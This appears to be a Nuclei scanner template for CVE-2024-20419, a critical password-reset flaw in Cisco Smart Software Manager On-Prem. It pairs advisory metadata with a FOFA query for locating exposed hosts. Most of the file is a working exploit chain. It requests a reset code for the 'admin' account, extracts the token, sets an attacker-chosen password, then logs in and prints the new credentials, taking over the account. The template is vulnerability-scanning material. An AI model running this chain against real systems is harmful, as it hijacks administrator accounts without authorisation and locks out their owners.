Cisco SSM On-Prem <= 8-202206 - Password Reset Account Takeover

id: CVE-2024-20419

info:
  name: Cisco SSM On-Prem <= 8-202206 - Password Reset Account Takeover
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A vulnerability in the authentication system of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, remote attacker to change the password of any user, including administrative users. This vulnerability is due to improper implementation of the password-change process.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow an attacker to access the web UI or API with the privileges of the compromised user.
  reference:
    - https://www.0xpolar.com/blog/CVE-2024-20419
    - https://nvd.nist.gov/vuln/detail/CVE-2024-20419
    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy
    - https://www.secpod.com/blog/critical-flaw-in-ciscos-secure-email-gateways-allows-attackers-to-control-the-device-completely/
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-20419
    cwe-id: CWE-620
    epss-score: 0.91469
    epss-percentile: 0.99682
  metadata:
    fofa-query: title="On-Prem License Workspace"
    verified: true
    max-request: 4
  tags: cve,cve2024,cisco,on-prem,ssm,intrusive,account-takeover,vkev,vuln

flow: http(1) && http(2) && http(3) && http(4)

variables:
  username: "admin"
  string1: "{{to_upper(rand_text_alphanumeric(7))}}"
  string2: "{{to_lower(rand_text_alphanumeric(7))}}"
  password: "{{string1}}{{string2}}!"

http:
  - raw:
      - |
        GET /backend/settings/oauth_adfs?hostname=polar HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - 'enabled'
          - 'redirect'
        condition: and
        internal: true

  - raw:
      - |
        POST /backend/reset_password/generate_code HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}

        {"uid": "admin"}

    matchers:
      - type: word
        words:
          - 'uid'
          - 'auth_token'
        condition: and
        internal: true

    extractors:
      - type: json
        part: body
        name: auth_token
        json:
          - ".auth_token"
        internal: true

  - raw:
      - |
        POST /backend/reset_password HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        X-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}

        {"uid": "admin","auth_token":"{{auth_token}}", "password":"{{password}}","password_confirmation":"{{password}}","common_name":""}

    matchers:
      - type: word
        words:
          - '"status":"OK"'
        condition: and
        internal: true

  - raw:
      - |
        POST /backend/auth/identity/callback HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    matchers:
      - type: word
        part: body
        words:
          - 'session_key'
          - 'role'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"USER: "+ username'
          - '"PASS: "+ password'
# digest: 4a0a004730450220035242c1a4ccd69a5cf62f07eef169bcdfbbbc8656a21e42ac413ab1f4724be5022100f1691e7c1941a7dbda394d6af752623050cc0e33fe93f6ef1064db5196592d43:922c64590222798bb761d5b6d8e72950